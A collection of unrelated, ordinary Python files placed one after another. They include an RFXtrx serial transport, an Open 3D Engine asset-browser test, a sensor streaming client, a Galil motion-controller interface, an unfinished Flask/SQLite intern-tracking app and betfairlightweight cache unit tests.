software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # pyRFXtrx is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with pyRFXtrx. See the file COPYING.txt in the distribution. # If not, see <http://www.gnu.org/licenses/>. """ This module provides a transport for PySerial """ import logging from serial import Serial from time import sleep from . import RFXtrxTransport logger = logging.getLogger(__name__) class PySerialTransport(RFXtrxTransport): """ Implementation of a transport using PySerial """ def __init__(self, port, debug=False): self.serial = Serial(port, 38400, timeout=0.1) self.debug = debug def receive_blocking(self): """ Wait until a packet is received and return with an RFXtrxEvent """ while True: data = self.serial.read() if (len(data) > 0): pkt = bytearray(data) data = self.serial.read(pkt[0]) pkt.extend(bytearray(data)) if self.debug: logger.debug( "Recv: " + " ".join("0x{0:02x}".format(x) for x in pkt)) return self.parse(pkt) def send(self, data): """ Send the given packet """ if isinstance(data, bytearray): pkt = data elif isinstance(data, str) or isinstance(data, bytes): pkt = bytearray(data) else: raise ValueError("Invalid type") if self.debug: logger.debug( "Send: " + " ".join("0x{0:02x}".format(x) for x in pkt)) self.serial.write(pkt) def reset(self): """ Reset the RFXtrx """ self.send('\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') sleep(0.3) # Should work with 0.05, but not for me self.serial.flushInput() self.send('\x0D\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00') # self.send('\x0D\x00\x00\x03\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00') return self.receive_blocking() """ Copyright (c) Contributors to the Open 3D Engine Project. 
For complete copyright and license terms please see the LICENSE at the root of this distribution. SPDX-License-Identifier: Apache-2.0 OR MIT Non-Material based assets excluded from Browser import azlmbr.materialeditor will fail with a ModuleNotFound error when using this script with Editor.exe This is because azlmbr.materialeditor only binds to MaterialEditor.exe and not Editor.exe You need to launch this script with MaterialEditor.exe in order for azlmbr.materialeditor to appear. """ import os import sys from PySide2 import QtWidgets import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devassets, "Gem", "PythonTests")) from editor_python_test_tools import pyside_utils from Automated.atom_utils.material_editor_utils import MaterialEditorHelper class NonMaterialAssetsExcludedInBrowserTest(MaterialEditorHelper): def __init__(self): MaterialEditorHelper.__init__(self, log_prefix="NonMaterialAssetsExcludedInBrowser_test_case") def run_test(self): """ Summary: Non-Material based assets are excluded from Browser. Test Steps: 1) Initialize QT objects 2) Browse through paths and validate if expected items are present and exluded extensions are not present Expected Result: Only expected files like .fbx, .material should be shown in browser, other files like .txt or .json should not be shown in Asset Browser :return: None """ # 1) Initialize QT objects editor_window = pyside_utils.get_editor_main_window() asset_browser = self.get_asset_browser(editor_window) tree = asset_browser.findChild(QtWidgets.QTreeView, "m_assetBrowserTreeViewWidget") # 2) Browse through paths and validate if expected items are present and exluded extensions are not present tree.expandAll() self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "LightingPresets"), "greenwich_park_03_2k_cm.exr", ) self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "Materials", "StandardPbrTestCases"), "001_DefaultWhite.material", ) self.browse_validate_assets( tree, ("Gems", "Atom", "AtomTestData", "TestData", "Multi-mat_fbx"), "multi-mat_1m_cube.fbx", ) def get_asset_browser(self, editor_window): """ Opens the Asset Browser if not opened already and returns the Qt object of Asset Browser :param editor_window - editor_window Qt object :return asset_browser - Qt object """ asset_browser = self.get_asset_browser_dock_widget(editor_window) if asset_browser is None or not asset_browser.isVisible(): action = pyside_utils.find_child_by_pattern(editor_window, {"iconText": "Asset Browser"}) action.trigger() self.wait_for_condition(lambda: self.get_asset_browser_dock_widget(editor_window) is not None) asset_browser = self.get_asset_browser_dock_widget(editor_window) return asset_browser def get_asset_browser_dock_widget(self, editor_window): """ Returns the Qt object of Asset Browser :param editor_window - editor_window Qt object :return asset_browser - Qt object (QDockWidget) """ return editor_window.findChild(QtWidgets.QDockWidget, "Asset Browser_DockWidget") def browse_validate_assets(self, tree, path_to_verify, allowed_item): """ Iterates each item of a folder under a given path and verifies if an item is present. Also verifies if any item ends with ".txt" or ".json". Log statements are printed accordingly. :param path_to_verify: Path in which items need to be browsed. Ex: ("Gems", "Atom", "AtomTestData", "TestData", "LightingPresets") :param allowed_item: Specific item to verify inside folder. Ex: 001_DefaultWhite.material. 
:return: None """ # Get the Model index for the path in which we need to verify assets model_index = pyside_utils.find_child_by_hierarchy(tree, *path_to_verify) # If path is invalid, print message accordingly if model_index is None: # NOTE: This does not necessarily mean that the functionality is not working as expected, # this may happen when the actual paths are updated, but this script is not updated, added the below # line to unexpected lines, so test would fail if that is the case, so that paths can be updated. print(f"Atom MaterialEditor asset path not found in browser: {path_to_verify}") return # else scroll in Asset Browser until we get to the folder tree.scrollTo(model_index) expected_item_found = False excluded_item_found = False model = tree.model() # Iterate through each item under that folder and perform validations for row in range(model.rowCount(model_index)): item_data = model.index(row, 0, model_index).data() if item_data == allowed_item: expected_item_found = True if item_data.endswith(".txt") or item_data.endswith(".json"): excluded_item_found = True # Print results accordingly if not expected_item_found: print(f"Expected item not found in folder {path_to_verify[-1]}") if excluded_item_found: print(f"Excluded item found in folder {path_to_verify[-1]}") test = NonMaterialAssetsExcludedInBrowserTest() test.run() from sys import argv def badclusterdetection(clustername, dataname, goodclusters): clusterfile = open(clustername, 'r') datafile = open(dataname, 'r') goodclusters = int(goodclusters) # process data file to determine which entries are normal # and which are anamolous data = {} line = datafile.readline() while line != '': cleanlinesplit = line.rstrip().split(' ') data[int(cleanlinesplit[0])-2] = cleanlinesplit[1].split(',')[-1] line = datafile.readline() # read clusters from clusterfile totalVertices = 0 clusters = [] line = clusterfile.readline() while line != '': if line != '\n': clusters.append(line.rstrip().split(' ')) totalVertices += len(line.split(' ')) line = clusterfile.readline() # analyze clusters tp = 0 tn = 0 fp = 0 fn = 0 for i,cluster in enumerate(sorted(clusters, key=len, reverse=True)): if i < goodclusters: for vertex in cluster: if data[int(vertex)] == "normal.": tp += 1 else: fp += 1 else: for vertex in cluster: if data[int(vertex)] == "normal.": fn += 1 else: tn += 1 #print analysis print "Positive Clusters:", str(goodclusters) print "Negative Clusters:", str(len(clusters) - goodclusters) print "TP: ", str(tp) print "TN: ", str(tn) print "FP: ", str(fp) print "FN: ", str(fn) print "TPR: ", str(float(tp) / (tp + fp)) print "TNR: ", str(float(tn) / (tn + fn)) print "FPR: ", str(float(fp) / (tp + fp)) print "FNR: ", str(float(fn) / (tn + fn)) print "ACCURACY: ", str((tp + tn) / float(tp + tn + fp + fn)) return (tp + tn) / float(tp + tn + fp + fn) if __name__ == "__main__": filename, clustername, dataname, goodclusters = argv badclusterdetection(clustername, dataname, goodclusters) <filename>python-streaming-client/stream_client.py import httplib from base64 import b64encode from threading import Lock,Thread import re from time import time, sleep from copy import copy from io import BytesIO import matplotlib.image as img import matplotlib.figure as fig import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from Tkinter import * import traceback class StreamClient: """ A sample streaming client for accessing the SensorLogger app multipart streaming """ CHUNK_SIZE = 32768 BUFFER_SIZE = 200000 def __init__(self, 
host, port=80): self.conn = httplib.HTTPConnection(host, port); self.re_length = re.compile(r".*Content-length: ?([0-9]+).*", re.M | re.S | re.I) self.re_type = re.compile(r"Content-type: ?([a-z]+)/.*", re.M | re.S | re.I) self.re_timestamp = re.compile(r".*X-Timestamp: ?([0-9]+).*", re.M | re.S | re.I) self.buffer = "0"*StreamClient.BUFFER_SIZE self.lock = Lock() self.last_update = 0 self.blen = 0 self.boundary = "" self.callback = None def get(self, callback, get="/", user=None, pw=""): """ Start the get request of the stream :param get: the url to get :param user: the user (for basic authentication) :param pw: the password """ if user is not None: userAndPass = b64encode(b"%s:%s"%(user,pw)).decode("ascii") headers = {'Authorization': 'Basic %s' % userAndPass} self.conn.request("GET", get, headers=headers) else: self.conn.request("GET", get) self.r = self.conn.getresponse() self.boundary = self.r.getheader("content-type") self.boundary = "--" + self.boundary[self.boundary.find("boundary=") + 9:] self.blen = len(self.boundary)+2 self.callback = callback Thread(target=self.read).start() def read(self): """ The reading thread """ print ("START") start = -1 restart = StreamClient.BUFFER_SIZE-StreamClient.CHUNK_SIZE d = self.r.read(StreamClient.CHUNK_SIZE) while d: #print "---------------------------", len(d) #print d self.buffer = self.buffer[StreamClient.CHUNK_SIZE:]+d self.last_update = time() if start<0: start = self.buffer.find(self.boundary, restart) end = self.buffer.find(self.boundary, start+self.blen) while start<end: #print (start, end, self.buffer[end+self.blen:end+100]) all = self.buffer[start+self.blen:end] headers_len = all.find("\r\n\r\n") + 4 headers = all[:headers_len] #print headers try: content_type = self.re_type.match(headers).group(1) timestamp = self.re_timestamp.match(headers).group(1) #print "FOUND: "+content_type, timestamp l = end - start - headers_len - 4 self.callback(timestamp, content_type, all[headers_len:headers_len+l+1]) except Exception as e: print e traceback.print_exc() #print ("ERROR CONTENT TYPE: %s" % headers) timestamp = -1 #try: # l = int(self.re_length.match(headers).group(1)) #finally: # print (all[:min(128,end)]) # print "--------------------------------------------------" start = end end = self.buffer.find(self.boundary, start+self.blen) d = self.r.read(StreamClient.CHUNK_SIZE) start -= StreamClient.CHUNK_SIZE restart = max(0, start, restart-StreamClient.CHUNK_SIZE) class Buffer: def __init__(self, image, data): self.image = image self.data = data self.timestamp = 0 def __copy__(self): return Buffer(self.image, [d[:] for d in self.data]) class StreamBuffer: N_BUFFERS = 5 def __init__(self, len): self.buffers = None self.currentIndex = 0 self.current = None self.len = len self.lock = Lock() self.re = re.compile(r"([a-zA-Z _\-]+[^XYZ]) ?([XYZ])?") self.init_buffers(0) def init_buffers(self, dimension): self.lock.acquire() data = [[0] * self.len for i in range(0, dimension)] self.buffers = [Buffer(None, data) for i in range(0, StreamBuffer.N_BUFFERS)] self.lock.release() def update_image(self, timestamp, image): self.lock.acquire() try: buf = self.buffers[self.currentIndex] buf.timestamp = timestamp buf.image = image finally: self.lock.release() def update_data(self, timestamp, i, values): self.lock.acquire() try: buf = self.buffers[self.currentIndex] buf.timestamp = timestamp for j,v in enumerate(values): buf.data[j][i] = float(v) finally: self.lock.release() def set_headers(self, values): old = "" dim = 0 sensors = [] for v in values: m = 
self.re.match(v) name = m.group(1) if name != old: if old != "": sensors.append({"name": old, "dimension": dim}) dim = 1 old = name else: dim += 1 sensors.append({"name": name, "dimension": dim}) self.init_buffers(len(values)) return sensors def swap(self): self.lock.acquire() current = self.buffers[self.currentIndex] self.currentIndex = (self.currentIndex + 1) % StreamBuffer.N_BUFFERS self.buffers[self.currentIndex] = copy(current) self.lock.release() return current class SensorDisplay: def __init__(self, name, dimension, length, axis, labels=("X", "Y", "Z", "par1", "par2"), styles=("r-","g-","b-","y-","m-")): self.sensor = name self.dimension = dimension self.labels = labels self.lines = [] axis.set_ylim(-15, 15) axis.set_title(name) for i in range(0, dimension): line, = axis.plot([0] * length, styles[i]) if dimension>1: line.set_label(labels[i]) self.lines.append(line) axis.legend() def set_data(self, data): for i,line in enumerate(self.lines): line.set_ydata(data[i]) class StreamDisplay: """ Create a window with a figure (remove this part and the display thread if you don't need to show the data) https://stackoverflow.com/questions/34764535/why-cant-matplotlib-plot-in-a-different-thread """ def __init__(self, buffer): self.buffer = buffer self.window = Tk() self.figure = fig.Figure(figsize=(8, 10)) self.charts = [] def draw(self): buffer = self.buffer.swap() try: if buffer.image is not None: im = img.imread(BytesIO(buffer.image), format=self.img_format) self.image.set_data(im) if len(buffer.data): curr = 0 for chart in self.charts: chart.set_data(buffer.data[curr:curr+chart.dimension]) curr += chart.dimension self.canvas.draw() plt.pause(0.001) except Exception as e: print e #traceback.print_stack() def wait(self): self.window.mainloop() def show(self, sensors=[], img_format="jpg"): # init axes self.sensors = sensors self.img_format = img_format self.image = self.figure.add_subplot(len(sensors)+1,1,1).imshow(img.imread("img.jpg", format=img_format)) axes = [] for i, s in enumerate(sensors): ax = self.figure.add_subplot(len(sensors)+1, 1, i+2, label=s["name"]) self.charts.append(SensorDisplay(s["name"], s["dimension"], self.buffer.len, ax)) # init canvas canvas = FigureCanvasTkAgg(self.figure, master=self.window) canvas.draw() canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) canvas._tkcanvas.pack(side=TOP, fill=BOTH, expand=1) self.canvas = canvas # start display thread Thread(name="display", target=self.thread, args=(self, 0.001)).start() def thread(self, display, delay): """ target of display thread """ while True: sleep(delay) display.draw() # do another task with the data # -*- coding: utf-8 -*- """ Created on Mon Sep 7 22:46:33 2020 @author: 91842 """ s = input() m = 0 d = [] for char in s: if char in d: d = d[d.index(char)+1:] d.append(char) print(d) m = max(m, len(d)) print(m)<reponame>Riteme/test from random import * n = 0 n = int(raw_input()) primes = [] marked = [False] * (n + 1) def compute_primes(): global primes global marked marked[0] = True marked[1] = True for i in range(2, n + 1): if not marked[i]: primes.append(i) for p in primes: if i * p > n: break marked[i * p] = True if i % p == 0: break def not_prime(n): BASIS = [2, 7, 61] if n in BASIS: return False def quick_pow(a, b, p): r = 1 while b: if b & 1: r = r * a % p a = a * a % p b >>= 1 return r # Decompose n - 1 into the form 2^r * t, where t is odd r = 0 t = n - 1 while not(t & 1): t >>= 1 r += 1 for b in BASIS: v = quick_pow(b % n, t, n) for i in range(0, r): u = v * v % n if u == 1 and v != 1 and v != n - 1: return True v = u if v != 1: return
True return False compute_primes() for i in range(2, n + 1): real = marked[i] test = not_prime(i) # print("i = %s, real = %s, test = %s" % (i, real, test)) if real != test: print("Prime test failed on %s." % (i)) <reponame>z4r4tu5tr4/live-de-quarta # Including swap from time import sleep from dashing import VGauge, HSplit from psutil import virtual_memory, swap_memory ui = HSplit( # ui HSplit( # ui.items[0] VGauge(title='RAM'), # ui.items[0].items[0] VGauge(title='Swap'), # ui.items[0].items[1] title='Memória', border_color=3 ) ) while True: # # Memory # RAM ram_tui = ui.items[0].items[0] memoria = virtual_memory().percent ram_tui.title = f'RAM {memoria} %' ram_tui.value = memoria # SWAP swap_tui = ui.items[0].items[1] memoria = swap_memory().percent swap_tui.title = f'SWAP {memoria} %' swap_tui.value = memoria try: ui.display() sleep(.5) except KeyboardInterrupt: break import sqlite3 from sqlite3 import Error import datetime import os from flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify from flask_sqlalchemy import SQLAlchemy def create_connection(db_file): """ create a database connection to the SQLite database specified by db_file :param db_file: database file :return: Connection object or None """ conn = None try: conn = sqlite3.connect(db_file) return conn except Error as e: print(e) return conn def create_table(conn, create_table_sql): """ create a table from the create_table_sql statement :param conn: Connection object :param create_table_sql: a CREATE TABLE statement :return: None """ try: c = conn.cursor() c.execute(create_table_sql) except Error as e: print(e) def drop_table(conn, drop_table_sql): """ Drop existing tables before creating new ones :param conn: Connection object :param drop_table_sql: a DROP TABLE statement :return: None """ try: c = conn.cursor() c.execute(drop_table_sql) except Error as e: print(e) def create_position(conn, position): """ Create a new position into the positions table :param conn: :param position: :return: None """ sql = ''' INSERT INTO positions(name,description) VALUES(?,?) ''' cur = conn.cursor() cur.execute(sql, position) conn.commit() def create_intern(conn, intern): """ Create a new intern :param conn: :param intern: :return: intern id """ sql = ''' INSERT INTO interns(last_name,first_name,position_applied,school,program,date_of_entry) VALUES(?,?,?,?,?,?)
''' cur = conn.cursor() cur.execute(sql, intern) conn.commit() return cur.lastrowid def create_interns_api(conn, json_data_packet): """ Create a new intern :param conn: :param json_data_packet :return: null """ for i in json_data_packet: intern=(i.get('Applicant Last Name'),i.get('Applicant First Name'),i.get('Position Applied For'),i.get('Applicant School'),i.get('Applicant Degree Program'),datetime.datetime.now()) create_intern(conn,intern) conn.commit() def main(): """ In this main function, we connect to the database, and we create position table and intern table and after that we create new position and new interns and insert the data into the position/intern table """ database = r"interns.db" sql_drop_positions_table=""" DROP TABLE positions """ sql_drop_interns_table=""" DROP TABLE interns """ sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions ( name text PRIMARY KEY, description text ); """ sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns ( id integer PRIMARY KEY, last_name text NOT NULL, first_name text NOT NULL, position_applied text NOT NULL, school text NOT NULL, program text NOT NULL, date_of_entry text NOT NULL, FOREIGN KEY (position_applied) REFERENCES positions (name) ON UPDATE NO ACTION );""" # create a database connection conn = create_connection(database) # create tables if conn is not None: #drop interns table before everything else drop_table(conn, sql_drop_interns_table) #drop positions table before everything else drop_table(conn, sql_drop_positions_table) # create projects table create_table(conn, sql_create_positions_table) # create tasks table create_table(conn, sql_create_interns_table) else: print("Error! cannot create the database connection.") with conn: #create position-later on change the check condition position=("Software Development Intern", "This position is for software development intern"); create_position(conn, position) #create interns: intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now()) intern_2=("C","D","Software Development Intern","GWU","Data Analytics",datetime.datetime.now()) create_intern(conn,intern_1) create_intern(conn,intern_2) conn.commit() conn.close() return database """ From here down is the part that I have not yet finished- showing the values in the database on the webpage and allow user to insert new values into the database via the webpage """ app = Flask(__name__) app.debug = True #app.config['SECRET_KEY'] = 'hard to guess secure key' # setup SQLAlchemy basedir = os.path.abspath(os.path.dirname(__file__)) #app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite') #db = SQLAlchemy(app) db=main() conn = create_connection(db) mycur = conn.cursor() # setup SQLAlchemy @app.route('/') def index(): """ This leads user to the home base page when the app runs """ # return HTML # return "<h1>this is the home page!<h1>" return render_template('home-base.html') @app.route('/positions') def show_all_positions(): """ This leads user to the position page when user clicks on the positions button on the top right and it is supposed to show user all the positions in the database """ db=main() conn = create_connection(db) mycur = conn.cursor() post=mycur.execute("SELECT * FROM positions") #positions = positions.query.all() return render_template('position-all.html', positions=post) @app.route('/position/add', methods=['GET', 'POST']) def add_positions(): """ This leads user to the position adding page when user clicks on the add positions 
button it is supposed to let user enter and add new positions into the database """ if request.method == 'GET': return render_template('position-add.html') if request.method == 'POST': # get data from the form name = request.form['name'] description = request.form['description'] #position = Position(name=name, description=description) position=(name, description); create_position(conn, position) # insert the data into the database #db.session.add(position) return redirect(url_for('show_all_positions')) @app.route('/interns') def show_all_interns(): """ This leads user to the position page when user clicks on the interns button on the top right and it is supposed to show user all the interns in the database """ db=main() conn = create_connection(db) mycur = conn.cursor() interns = mycur.execute("SELECT * FROM interns") return render_template('intern-all.html', interns=interns) @app.route('/intern/add', methods=['GET', 'POST']) def add_interns(): """ This leads user to the position adding page when user clicks on the add interns button it is supposed to let user enter and add new interns into the database """ if request.method == 'GET': db=main() conn = create_connection(db) mycur = conn.cursor() positions=mycur.execute("SELECT * FROM positions") return render_template('intern-add.html', positions=positions) if request.method == 'POST': # get data from the form db=main() conn = create_connection(db) mycur = conn.cursor() positions=mycur.execute("SELECT * FROM positions") last_name=request.form['last_name'] first_name = request.form['first_name'] position_applied = request.form['position_applied'] school = request.form['school'] program = request.form['program'] position = positions.query.filter_by(name=position_applied).first() intern = (last_name, first_name, position, school, program, datetime.datetime.now()) create_intern(conn,intern) # insert the data into the database #db.session.add(intern) #db.session.commit() return redirect(url_for('show_all_interns')) if __name__ == '__main__': main() #app.run() <reponame>erickgnavar/mozio-test # Generated by Django 2.0.4 on 2018-04-23 07:55 import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import model_utils.fields class Migration(migrations.Migration): initial = True dependencies = [ ('providers', '0001_initial'), ] operations = [ migrations.CreateModel( name='ServiceArea', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')), ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')), ('name', models.CharField(max_length=50, verbose_name='Name')), ('price', models.DecimalField(decimal_places=2, max_digits=8, verbose_name='Price')), ('polygon', django.contrib.gis.db.models.fields.PolygonField(srid=4326, verbose_name='Polygon')), ('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_areas', to='providers.Provider')), ], options={ 'verbose_name': 'Service Area', 'verbose_name_plural': 'Service Areas', 'default_related_name': 'service_areas', }, ), ] <filename>pypi_check/__init__.py from __future__ import absolute_import from .pypi import main <reponame>crigroup/galilmc #!/usr/bin/env python import enum import gclib import string import threading import collections 
import numpy as np _EPS = np.finfo(float).eps class ControlMode(enum.Enum): NONE = 1 JOG = 2 POSITION_TRACKING = 3 class GalilHardwareInterface(object): def __init__(self): # Default values self._reset() # Instance of the gclib python class self.g = gclib.py() self.mutex = threading.Lock() def _reset(self): self.num_axes = -1 self.connected = False self.mode = dict() def connect(self, address, subscribe, direct=True): """ Connect to a Galil Controller. Parameters ---------- address: str Simple address to hardware. It can be IP address, PCI, COM port subscribe: str or :class:`SubscribeType` Subscribe to messages, data records, and/or interrupts direct: bool, optional Connect directly to hardware instead of via gcaps Returns ------- cmd: str The string sent to the controller using `GOpen` """ cmd = address if direct: cmd += ' --direct' if isinstance(subscribe, str): cmd += ' -s {}'.format(subscribe) elif isinstance(subscribe, SubscribeType): cmd += ' -s {}'.format(subscribe.name) try: with self.mutex: self.g.GOpen(cmd) # Report we managed to connect and get the number of axes self.connected = True self.num_axes = len(self.send_command('TP*=?').split(',')) for i in range(self.num_axes): axis = string.ascii_uppercase[i] self.mode[axis] = ControlMode.NONE except gclib.GclibError as e: self._reset() return cmd def disconnect(self): self._reset() try: with self.mutex: self.g.GClose() success = True except gclib.GclibError: success = False return success def get_position(self, axis): if not self.connected: return None axis = axis.upper() try: position = float(self.send_command('TP{}'.format(axis))) except (gclib.GclibError, ValueError): position = None return position def get_position_error(self, axis): if not self.connected: return None axis = axis.upper() try: position_error = float(self.send_command('TE{}'.format(axis))) except (gclib.GclibError, ValueError): position_error = None return position_error def get_velocity(self, axis): if not self.connected: return None axis = axis.upper() try: velocity = float(self.send_command('TV{}'.format(axis))) except (gclib.GclibError, ValueError): velocity = None return velocity def get_torque(self, axis): if not self.connected: return None axis = axis.upper() try: torque = float(self.send_command('TT{}'.format(axis))) except (gclib.GclibError, ValueError): torque = None return torque def jog(self, axis, counts_per_sec): """ Parameters ---------- axis: str Letter that identifies the axis (A, B, C, etc) counts_per_sec: int The target jog speed of the axis. The units of this are [counts/second]. """ axis = axis.upper() if axis not in self.mode.keys(): raise ValueError('Jog command received invalid axis') # Check the control mode is valid if self.mode[axis] == ControlMode.NONE: self.mode[axis] = ControlMode.JOG elif self.mode[axis] != ControlMode.JOG: raise TypeError('Cannot process jog command. Invalid control mode') # Process the command if self.is_moving(axis): self.send_command('JG{}'.format(axis), int(counts_per_sec)) else: self.send_command('SH{}'.format(axis)) self.send_command('JG{}'.format(axis), int(counts_per_sec)) self.send_command('BG{}'.format(axis)) def is_connected(self): return self.connected def is_moving(self, axis): axis = axis.upper() try: res = float(self.send_command('MG _BG{}'.format(axis))) except gclib.GclibError: res = 0. 
return res > _EPS def is_valid_axis(self, axis): is_valid = False axis = axis.upper() if axis in string.ascii_uppercase: is_valid = string.ascii_uppercase.index(axis) < self.num_axes return is_valid def position_tracking(self, axis, counts, counts_per_sec): """ Parameters ---------- axis: str Letter that identifies the axis (A, B, C, etc) counts: int The absolute position target. The units of this are [counts]. counts_per_sec: int The target speed of the axis. The units of this are [counts/second]. """ axis = axis.upper() if axis not in self.mode.keys(): raise ValueError('Position command received invalid axis') # Check the control mode is valid if self.mode[axis] == ControlMode.NONE: self.mode[axis] = ControlMode.POSITION_TRACKING # Change the coordinate system and enable the servo control self.send_command('SH{}'.format(axis)) self.send_command('BG{}'.format(axis)) # Enable position tracking self.send_command('DP{}'.format(axis), 0) # Zero the absolute position self.send_command('PT{}'.format(axis), 1) # Start PT mode elif self.mode[axis] != ControlMode.POSITION_TRACKING: raise TypeError('Cannot process position command. Invalid control mode') # Process the command self.send_command('SP{}'.format(axis), int(counts_per_sec)) self.send_command('PA{}'.format(axis), int(counts)) def send_command(self, key, value=None): cmd = key if isinstance(value, (int, float, basestring)): cmd += ' = ' + str(value) elif isinstance(value, collections.Sequence): cmd += ' = ' + ', '.join(map(str,value)) elif value is not None: raise TypeError('Unsupported value type: {}'.format(type(value))) try: with self.mutex: res = self.g.GCommand(cmd) except gclib.GclibError: res = None return res def stop(self, axis=None): success = False if self.connected: if axis is None: res = self.send_command('ST') success = res is not None elif self.is_valid_axis(axis): axis = axis.upper() res = self.send_command('ST{}'.format(axis)) success = res is not None # Reset control mode if success: if axis is None: axes = self.mode.keys() elif self.is_valid_axis(axis): axes = [axis] for a in axes: self.mode[a.upper()] = ControlMode.NONE return success def turn_off(self, axis=None): """ Turn off the specified motor. If `axis=None`, turn off all the motors Parameters ---------- axis: str Uppercase letter that identifies the axis (A, B, C, etc) Returns ------- success: bool True if succeeded, False otherwise. Notes ----- This command attempts to stop the axes before turning then off. 
This is because a `MO` command will fail if the axis is moving """ success = False if self.connected: self.stop(axis) if axis is None: res = self.send_command('MO') success = res is not None elif self.is_valid_axis(axis): axis = axis.upper() res = self.send_command('MO{}'.format(axis)) success = res is not None return success class SubscribeType(enum.Enum): """ Flag to indicate whether to subscribe to messages, data records, and/or interrupts """ NONE = 1 MG = 2 DR = 3 EI = 4 ALL = 5 if __name__ == '__main__': # Simple usage example from galilmc import GalilHardwareInterface interface = GalilHardwareInterface() cmd = interface.connect('192.168.0.41', subscribe='ALL', direct=False) if not interface.is_connected(): raise Exception('Failed to connect to the galilmc: {}'.format(cmd)) # Setup interface.send_command('AUA', 1) interface.send_command('AGA', 2) interface.send_command('TLA', 7) interface.send_command('CEA', 3) interface.send_command('MTA', -1) interface.send_command('BRA', 0) interface.send_command('ACA', 15432704) interface.send_command('DCA', 15432704) interface.send_command('ERA', 2500) interface.send_command('OEA', 0) interface.send_command('KPA', 6) # Low gain to avoid overshooting interface.send_command('KDA', 64) # Test the position tracking rpm = 1400 encoder_ppr = 2500 depth = 8e-3 pitch = 0.8e-3 counts = (depth / pitch) * encoder_ppr counts_per_sec = rpm * encoder_ppr / 60. interface.position_tracking('A', counts, counts_per_sec) # Clean-up interface.turn_off() interface.disconnect() <reponame>zahraaliaghazadeh/python # Get input. word1 = input("Enter word #1: ") word2 = input("Enter word #2: ") # code here # assigning vairables and swapping thr values temp = word1 word1 = word2 word2 = temp # Print results. print () # prints blank line print("Swapping results") print("word #1:", word1) print("word #2:", word2) # run the code by python3 swap.py<gh_stars>1-10 import datetime import unittest from betfairlightweight.resources.baseresource import BaseResource from betfairlightweight.streaming.cache import ( OrderBookCache, OrderBookRunner, UnmatchedOrder, MarketBookCache, RunnerBook, Available, ) from betfairlightweight.exceptions import CacheError from tests import mock from tests.unit.tools import create_mock_json class TestAvailable(unittest.TestCase): def setUp(self): self.prices = [[1, 1.02, 34.45], [0, 1.01, 12]] self.available = Available(self.prices, 2) def test_init(self): assert self.available.prices == self.prices assert self.available.deletion_select == 2 assert self.available.reverse is False def test_sort(self): self.available.sort() assert self.available.prices == self.prices assert self.available.serialise == [{'price': 1.01, 'size': 12}, {'price': 1.02, 'size': 34.45}] def test_sort_short(self): current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] available = Available(current, 1) assert available.serialise == [ {'price': 1.02, 'size': 1157.21}, {'price': 13, 'size': 28.01}, {'price': 27, 'size': 0.95} ] def test_clear(self): self.available.clear() assert self.available.prices == [] def test_update_available_new_update(self): # [price, size] book_update = [[30, 6.9]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01], [27, 0.95], [30, 6.9]] available = Available(current, 1) available.update(book_update) assert current == expected book_update = [[30, 6.9], [1.01, 12]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.01, 12], [1.02, 1157.21], [13, 28.01], [27, 0.95], [30, 6.9]] available = 
Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0.57]] current = [] expected = [[0, 36, 0.57]] available = Available(current, 2) available.update(book_update) assert available.prices == expected def test_update_available_new_replace(self): # [price, size] book_update = [[27, 6.9]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01], [27, 6.9]] available = Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0.57]] current = [[0, 36, 10.57], [1, 38, 3.57]] expected = [[0, 36, 0.57], [1, 38, 3.57]] available = Available(current, 2) available.update(book_update) assert current == expected # tests handling of betfair bug, http://forum.bdp.betfair.com/showthread.php?t=3351 book_update = [[2, 0, 0], [1, 1.01, 9835.74], [0, 1.02, 1126.22]] current = [[1, 1.01, 9835.74], [0, 1.02, 1126.22]] expected = [[0, 1.02, 1126.22], [1, 1.01, 9835.74]] available = Available(current, 2) available.update(book_update) assert current == expected def test_update_available_new_remove(self): book_update = [[27, 0]] current = [[27, 0.95], [13, 28.01], [1.02, 1157.21]] expected = [[1.02, 1157.21], [13, 28.01]] available = Available(current, 1) available.update(book_update) assert current == expected # [position, price, size] book_update = [[0, 36, 0], [1, 38, 0], [0, 38, 3.57]] current = [[0, 36, 10.57], [1, 38, 3.57]] expected = [[0, 38, 3.57]] available = Available(current, 2) available.update(book_update) assert current == expected class TestMarketBookCache(unittest.TestCase): def setUp(self): self.market_book_cache = MarketBookCache(**{'marketDefinition': {'runners': {}}}) def test_error(self): with self.assertRaises(CacheError): self.market_book_cache = MarketBookCache() @mock.patch('betfairlightweight.streaming.cache.MarketBookCache.strip_datetime') def test_update_cache_md(self, mock_strip_datetime): 